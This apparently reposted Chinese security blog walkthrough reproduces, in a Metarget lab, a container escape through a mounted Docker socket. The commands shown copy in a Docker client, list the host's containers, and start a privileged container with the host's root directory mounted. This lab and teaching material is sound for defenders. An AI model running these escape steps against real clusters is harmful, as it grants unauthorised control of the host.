挂载docker.sock导致容器逃逸

2024年2月24日22:47:37评论13 views字数 5186阅读17分17秒阅读模式

【场景类型】
容器逃逸--危险挂载

【背景介绍】
Docker Socket是Docker守护进程监听的Unix域套接字，用来与守护进程通信——查询信息或下发命令。如果在攻击者可控的容器内挂载了该套接字文件（/var/run/docker.sock），可通过Docker Socket与Docker守护进程通信，发送命令创建并运行一个新的容器，将宿主机的根目录挂载到新创建的容器内部，完成简单逃逸

【环境搭建】

基础环境准备,任意版本的docker

./metarget gadget install docker --version 18.03.1./metarget gadget install k8s --version 1.16.5 --domestic

漏洞环境搭建

root@zyliang:~/metarget# ./metarget cnv install mount-docker-sockdocker already installedkubernetes already installedmount-docker-sock is going to be installedapplying yamls/k8s_metarget_namespace.yamlapplying vulns_cn/mounts/pods/mount-docker-sock.yamlmount-docker-sock successfully installedroot@zyliang:~/metarget# kubectl get pod -n metarget NAME                READY   STATUS    RESTARTS   AGEmount-docker-sock   1/1     Running   0          10s

【漏洞复现】

安装docker命令行客户端

#下载客户端并copy到容器root@zyliang:~# wget https://download.docker.com/linux/static/stable/x86_64/docker-17.03.0-ce.tgzroot@zyliang:~# docker ps | grep sockb425667a1be5   ba6acccedd29                  "/bin/bash -c -- 'wh…"   4 minutes ago   Up 4 minutes              k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_01b7ccc8e47bc   k8s.gcr.io/pause:3.1          "/pause"                 4 minutes ago   Up 4 minutes              k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0root@zyliang:~# docker cp docker-17.03.0-ce.tgz b425667a1be5:/Successfully copied 27.8MB to b425667a1be5:/root@zyliang:~# kubectl exec -ti mount-docker-sock -n metarget bashroot@mount-docker-sock:/# lsbin  boot  dev  docker-17.03.0-ce.tgz  etc  home  lib  lib32  lib64  libx32  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  varroot@mount-docker-sock:/# tar xf ./docker-17.03.0-ce.tgzroot@mount-docker-sock:/# cd dockerroot@mount-docker-sock:/docker# lsdocker  docker-containerd  docker-containerd-ctr  docker-containerd-shim  docker-init  docker-proxy  docker-runc  dockerd

容器内docker ps，确认挂载docker.sock成功

root@mount-docker-sock:/docker# ./docker psCONTAINER ID        IMAGE                         COMMAND                  CREATED             STATUS              PORTS               NAMESb425667a1be5        ba6acccedd29                  "/bin/bash -c -- '..."   7 minutes ago       Up 7 minutes                            k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_01b7ccc8e47bc        k8s.gcr.io/pause:3.1          "/pause"                 7 minutes ago       Up 7 minutes                            k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_01f21b8c613d5        ba6acccedd29                  "/bin/bash -c -- '..."   4 hours ago         Up 4 hours                              k8s_ubuntu_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0eaa6db463eea        k8s.gcr.io/pause:3.1          "/pause"                 4 hours ago         Up 4 hours                              k8s_POD_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0336c2bef5a3f        5dd8f24429b4                  "kube-controller-m..."   45 hours ago        Up 45 hours                             k8s_kube-controller-manager_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_2ce01dda16af0        8d2e2e5a92ac                  "kube-scheduler --..."   45 hours ago        Up 45 hours                             k8s_kube-scheduler_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_281438fb18ba4        f03a23d55e57                  "/opt/bin/flanneld..."   45 hours ago        Up 46 hours                             k8s_kube-flannel_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1879f271e40c5        70f311871ae1                  "/coredns -conf /e..."   45 hours ago        Up 46 hours                             k8s_coredns_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_13f0fae5accd1        628f0e52ae53                  "kube-apiserver --..."   45 hours ago        Up 46 hours                             k8s_kube-apiserver_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_18b3f58f3a00d        87a399dffea6                  "/usr/local/bin/ku..."   45 hours ago        Up 46 hours                             k8s_kube-proxy_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_18e348df66d56        303ce5db0e90                  "etcd --advertise-..."   45 hours ago        Up 46 hours                             k8s_etcd_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_1f290e34beede        70f311871ae1                  "/coredns -conf /e..."   45 hours ago        Up 46 hours                             k8s_coredns_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1b79655911a2c        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_12250007f5f66        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1f245faafd5f3        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1aaedfa1721d1        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_16d4d5b451730        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_22acaa76e2732        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_1447554958f5b        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_17179398f9453        k8s.gcr.io/pause:3.1          "/pause"                 45 hours ago        Up 46 hours                             k8s_POD_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_13a91b45e2ca5        dirtycowdockervdso_dirtycow   "/bin/bash"              2 days ago          Up 46 hours         1234/tcp            dirtycowdockervdso_dirtycow_run_1

容器内启动一个挂载宿主机根目录的特权容器,完成逃逸

root@mount-docker-sock:/docker# ./docker run -it -v /:/host --privileged --name=sock-test ubuntu /bin/bashroot@08554a1cd523:/# ls /host/bin   dev            etc   home        initrd.img.old  lib    lost+found  mnt  proc  run   srv       sys  usr  vmlinuzboot  dirtycow-vdso  evil  initrd.img  install         lib64  media       opt  root  sbin  swapfile  tmp  var  vmlinuz.oldroot@08554a1cd523:/# cat host/etc/hostname zyliang

【参考链接】

https://github.com/Metarget/metarget/tree/master/writeups_cnv/mount-docker-sock

原文始发于微信公众号（zyliang）：挂载docker.sock导致容器逃逸

左青龙
微信扫一扫

右白虎
微信扫一扫

挂载docker.sock导致容器逃逸

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

漏洞挖掘 | 某米企业src未授权访问

初遇内嵌WebShell的pdf文件

Hackerone 附件功能存在IDOR越权漏洞15000$

从环境搭建到内网渗透靶机

漏洞挖掘之某厂商OAuth2.0认证缺陷

发表评论

在线咨询

微信